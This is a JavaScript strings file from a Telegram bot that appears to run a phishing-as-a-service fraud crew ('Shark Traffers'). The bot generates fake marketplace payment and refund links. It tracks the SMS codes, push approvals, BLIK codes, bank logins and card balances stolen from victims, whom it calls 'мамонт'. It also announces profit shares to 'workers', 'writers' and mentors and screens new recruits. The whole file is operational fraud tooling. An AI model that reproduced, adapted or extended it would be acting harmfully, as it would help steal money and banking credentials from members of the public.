module.exports = {
  statuses: {
    sms: "📥 СМС-КОД",
    lk: "🔐 ЛК",
    push: "📱 ПУШ",
    blik: "#️⃣ БЛИК",
    appCode: "📬 КОД С ПРИЛОЖЕНИЯ",
    callCode: "☎️ КОД ИЗ ЗВОНКА",
    picture: "🖼 КАРТИНКА",
    limits: "⚠️ ЛИМИТЫ",
    otherCard: "⚠️ ДРУГАЯ КАРТА",
    correctBalance: "⚠️ ТОЧНЫЙ БАЛАНС",
    forVerify: "⚠️ НУЖЕН БАЛАНС",
  },
  workerStatuses: {
    push: "📲 Вашему мамонту отправили ПУШ",
    sms: "📤 Вашему мамонту отправили СМС-КОД",
    lk: "🔐 Вашего мамонта отправили на ЛК",
    blik: "📩 Вашему мамонту отправили БЛИК",
    callCode: "☎️ Вашему мамонту отправили звонок с кодом",
    appCode: "📬 Вашему мамонту отправили код в приложение",
    picture: "🖼 Вашему мамонту отправили картинку",
    limits: "⚠️ Ваш мамонт должен поднять лимиты",
    otherCard: "⚠️ Ваш мамонт должен ввести другую карту",
    forVerify: "⚠️ У вашего мамонта должен быть баланс на карте",
    correctBalance: "⚠️ Ваш мамонт должен ввести точный баланс",
  },
  wrongWorkerStatuses: {
    code: "❌ Ваш мамонт ввёл неверный КОД",
    lk: "❌ Ваш мамонт ввёл неверные данные от ЛК",
    picture: "❌ Ваш мамонт выбрал неверную КАРТИНКУ",
    push: "❌ Ваш мамонт не подтверждает ПУШ",
  },
  newProfit: {
    channel: `<b>🪝 НОВЫЙ УЛОВ, ПОЗДРАВЛЯЕМ🦈</b>

💸 Сумма: <b>{amount}</b>
💴 Процент воркера: <b>{workerAmount}</b>

👤 Воркер: <b>{worker}</b>
✍️ Вбивер: <b>{writer}</b>`,
    channelReferal: `<b>💰 ВЫПЛАТА ПО РЕФЕРАЛКЕ</b>
🔑 ID: <b>{profitId}</b>
💸 Сумма: <b>{amount}</b>
👤 Воркер: <b>{worker}</b>`,
    channelMentor: `<b>💰 ВЫПЛАТА МЕНТОРУ</b>
🔑 ID: <b>{profitId}</b>
💸 Сумма: <b>{amount}</b>
👤 Ментор: <b>{worker}</b>`,
    wait: "⏳ В ожидании",
    payed: "✅ Выплачено",
    razvitie: "🌎 На развитие",
    worker: `🎉 <b>ПРОФИТ! ПОЗДРАВЛЯЕМ, SHARK TRAFFERS ГОРДИТЬСЯ ТОБОЙ!</b>🦈
    
💰 Твой процент: <b>{workerAmount}</b>
✍️ Вбивер: <b>{writer}</b>
    
⚡️ <b>Продолжай в том же духе</b>`,
    referral: `<b>🎉 Вам засчитан профит #{profitId} в размере {amount} за реферала</b>`,
    mentor: `<b>🎉 Вам засчитан профит #{profitId} в размере {amount} за наставничество</b>`,
  },
  myAd: {
    text: `<b>📦 Объявление {service}</b>

💬 Название: <b>{title}</b>
💰 Цена: <b>{price}</b>
📰 Имя: <b>{name}</b>
📱 Телефон: <b>{phone}</b>
🏡 Адрес: <b>{address}</b>
💸 Чекер баланса: <b>{balanceChecker}</b>

🔗 Получение оплаты: <b>{fakeLink}</b>
🔗 Возврат: <b>{refundLink}</b>`,
  },
  now_writers: "✍️ Сейчас на вбиве:",
  chat_list: "💬 Список чатов",
  payouts: "💸 Выплаты",
  workers: "👥 Воркеры",
  top_workers: "🏆 Топ воркеров",
  top_null: "🔍 В топе ещё никого нету",
  mainMenu: {
    text: `
Заряду тебе, {name_user}! 🤚🏻

⌚️ На моих Rolex сейчас {time_text}, время ЕБАШИТЬ
💶 Сегодня мы платим {procent}% от каждого профита по Узбекистану!

Статус: <b>{status}</b>
Всего заработано: <b>{profits_sum}</b>
USDT: <b>{USDTWallet}</b>`,
    buttons: {
      main_menu: "📊 Профиль",
      create_link: "🔗 Создать ссылку",
      my_ads: "🛍 Мои объявления",
      my_profits: "💸 Мои профиты",
      writer: "✍️ Вбиверы",
      workers_top: "🏆 Топ воркеров",
      chats: "💬 Чаты",
      settings: "🔩 Настройки",
      send_sms: "📤 Отправить СМС",
      parse: "🤖 Спарсить объявления",
      my_parsings: "🗃 Мои парсинги",
      instruments: "🧰 Инструменты",
      information: "📖 Информация",
    },
  },
  instruments: {
    referral: "📊 Рефералка",
    mentors: "👨‍🎓 Наставники",
    send_sms: "📲 Отправить СМС",
    send_email: "📨 Отправить E-mail",
    complaint: "📕 Жалоба | Вопрос 📗",
    support: "🗣 Тех. поддержка",
    kassa: "💰 Касса",
    whatsapp: "📞 Ссылка на WhatsApp",
  },
  mentors: {
    mentors_list: "📚 Список наставников",
    change_mentor: "🔧 Сменить/удалить наставника",
    my_anket: "📰 Моя анкета",
    create_anket: "✏️ Создать анкету",
    delete_anket: "🧹 Удалить анкету",
    anket: `📰 <b>Анкета #{id}</b>

👨‍🎓 <b>Наставник:</b> @{mentorUsername}
🌍 <b>Страны:</b> {countries}
👨‍👨‍👦 <b>Учеников:</b> {students}
📝 <b>Описание:</b>
{text}`,
  },
  choose_country: "🌍 Выберите страну",
  choose_service: "🛒 Что будем генерировать? Выбери внешний вид фишинга.",
  go_to_menu: "🔙 В меню",
  go_back: "🔙 Назад",
  roles: {
    admin: "Администратор",
    writer: "Вбивер",
    worker: "Воркер",
    pro: "Профи",
  },
  requests: {
    need_send_request: "<b>⚠️ Для использования бота необходимо подать заявку. Вы готовы?</b>",
    ready_send_button: "✅ Я готов! Перейти к заполнению заявки",
    wait_request_process: "⏳ Ожидайте рассмотрения вашей заявки",
    done: "⌚️ <b>Отлично! Твоя заявка была отправлена на рассмотрение админам, ожидай</b>",
    accepted: "⚡️ <b>Твоя заявка одобрена, добро пожаловать в команду! В дальнейшем ты можешь использовать команду  /start  для вызова кнопки меню.</b>",
    declined: "😞 Ваша заявка была отклонена",
    steps: [
      {
        request_text: "Откуда узнал",
        scene_text: `☺️ Хорошо, приступаем к заполнению заявки. Первый вопрос:

<b>Откуда Вы о нас узнали? (Источник)</b>`,
      },
      {
        request_text: "Какой опыт",
        scene_text: `👍 Отлично! Второй вопрос:

<b>Имеется ли у вас опыт работы в сфере? (Где раньше работали, по каким странам, количество профитов)</b>`,
      },
      {
        request_text: "Сколько времени готов уделять",
        scene_text: `✌️ И последний вопрос:

<b>Сколько времени Вы готовы уделять этой работе?</b>`,
      },
    ],
  },
  your_account_banned: "❌ Ваш аккаунт заблокировали",
  newChatMemberText: "🥳 Добро пожаловать в чат нашего проекта, {username}!",
};
